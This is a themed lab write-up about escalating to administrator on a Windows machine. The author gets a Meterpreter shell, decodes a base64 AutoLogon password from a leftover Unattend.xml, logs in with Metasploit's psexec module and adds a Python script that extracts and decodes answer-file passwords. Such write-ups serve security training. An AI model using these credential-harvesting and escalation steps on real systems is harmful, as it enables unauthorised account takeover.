+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
Tools used
Metasploit Framework
Workflow:
In this lab the target machine was already set up and reachable, so I generated a reverse shell payload and uploaded it to the target through a Python HTTP server (python -m http.server) that I started just for this transfer.
I executed the shell on the target and got a reverse shell session, which I then upgraded to a Meterpreter session with sessions -u <id>.
After that I checked which user I was running as, PRIV-ESC\student, and which privileges that user had:
meterpreter > getuid
Server username: PRIV-ESC\student
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
The goal of this lab is to get a Meterpreter session with elevated privileges. The three privileges listed above are the defaults for an ordinary user and give no direct path up, so the next step is to look for leftover credentials on the box.
Unattend.xml
is the answer file used for unattended Windows installations. It can hold account data for features such as AutoLogon, which is what we are exploring in this lab. The passwords in it are not encrypted, only base64-encoded, so anyone who can read the file can recover them. It is usually found at C:\Windows\Panther\Unattend.xml; other common leftover locations worth checking are C:\Windows\Panther\Unattend\Unattend.xml and C:\Windows\System32\Sysprep\Unattend.xml (or sysprep.xml).
So naturally that is what I checked, and bingo: it contained an AutoLogon block for the administrator account with a password we could reuse later.
<AutoLogon>
<Password>
<Value>QWRtaW5AMTIz</Value>
<PlainText>false</PlainText>
</Password>
<Enabled>true</Enabled>
<Username>administrator</Username>
</AutoLogon>
Decoding this gives Admin@123. Note that <PlainText>false</PlainText> only means the value is base64-encoded, not that it is protected; answer files produced by Windows System Image Manager may also append the literal string "Password" to the password before encoding, so strip that suffix if it shows up after decoding.
I then used these credentials with Metasploit's exploit/windows/smb/psexec module to get a Meterpreter session running as that administrator (the module needs SMB reachable on the target and an account with local admin rights, which is exactly what the AutoLogon entry gave us).
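As an added example (not part of the original writeup and not Metasploit code), here is a small Python parser that does the decoding step for the answer-file format discussed above. It assumes a sample Unattend.xml constructed from the fragment shown, plus a made-up LocalAccount entry (user svc_deploy, encoded password P@ssw0rdPassword) to show the "Password"-suffix case; it handles the namespaced root a real file uses as well as the bare fragment, and honours the PlainText flag.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample: the AutoLogon fragment from the writeup, wrapped in the
# root element and namespace a real answer file uses, plus a made-up
# LocalAccount entry whose encoded value carries the "Password" suffix.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>QWRtaW5AMTIz</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>UEBzc3cwcmRQYXNzd29yZA==</Value>
              <PlainText>false</PlainText>
            </Password>
            <Name>svc_deploy</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def _local(tag):
    """Strip the XML namespace so lookups work with or without it."""
    return tag.rsplit('}', 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child called `name`, or None."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or '').strip()
    return None


def decode_unattend_password(value, plain_text):
    """Return password candidates for one <Password> block.

    PlainText=true means the literal value; PlainText=false means base64.
    Files written by Windows System Image Manager append "Password" before
    encoding, so the suffix-stripped form is returned first when it applies.
    """
    if plain_text:
        return [value]
    decoded = base64.b64decode(value).decode('utf-8', errors='replace')
    candidates = [decoded]
    if decoded.endswith('Password') and len(decoded) > len('Password'):
        candidates.insert(0, decoded[:-len('Password')])
    return candidates


def extract_unattend_credentials(xml_text):
    """Walk AutoLogon and LocalAccount entries and decode their passwords."""
    root = ET.fromstring(xml_text)
    found = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name == 'AutoLogon':
            user = _child_text(elem, 'Username')
            enabled = _child_text(elem, 'Enabled')
        elif name == 'LocalAccount':
            user = _child_text(elem, 'Name')
            enabled = None
        else:
            continue
        pw = next((c for c in elem if _local(c.tag) == 'Password'), None)
        if pw is None:
            continue
        value = _child_text(pw, 'Value')
        if not value:
            continue
        plain = (_child_text(pw, 'PlainText') or 'false').lower() == 'true'
        found.append({
            'source': name,
            'username': user,
            'enabled': enabled,
            'candidates': decode_unattend_password(value, plain),
        })
    return found


if __name__ == '__main__':
    for cred in extract_unattend_credentials(SAMPLE_UNATTEND):
        print(cred)
```

Metasploit automates the same hunt with post/windows/gather/enum_unattend, which walks the usual file locations from an existing session and prints any credentials it finds; the script above is for when you have already pulled the file out with Meterpreter's download command or want to check the suffix handling yourself.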
After this, the flag was on the Administrator account's desktop:
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2020-10-27 15:14:30 +0530 desktop.ini
100666/rw-rw-rw- 32 fil 2020-11-07 12:33:58 +0530 flag.txt
GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++